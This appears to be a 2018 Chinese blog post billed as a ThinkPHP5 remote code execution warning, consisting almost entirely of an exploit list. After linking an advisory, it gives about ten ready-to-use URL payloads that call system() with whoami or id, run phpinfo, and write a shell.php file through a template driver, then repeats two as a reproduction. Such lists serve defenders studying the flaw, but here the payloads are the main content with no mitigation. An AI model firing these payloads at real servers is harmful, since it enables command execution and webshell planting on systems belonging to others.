×
ThinkPHP 远程命令执行漏洞预警附带EXP
  • 分类:技术文章
  • 发表:2018年12月11日
  • 围观()
  • 评论()
后台-系统设置-扩展变量-手机广告位-内容正文顶部
【漏洞预警】ThinkPHP5远程代码执行高危漏洞 :https://help.aliyun.com/noticelist/articleid/1000081331.html
 
EXP:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/ThinkPHP/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=index/\think\Request/input&filter=phpinfo&data=1
?s=index/\think\Request/input&filter=system&data=id
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
复现情况:
?s=index/\think\Request/input&filter=phpinfo&data=1
 
 
 
 
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

 
 
后台-系统设置-扩展变量-手机广告位-内容正文底部

相关文章

留言与评论(共有 0 条评论)
   
验证码:
Top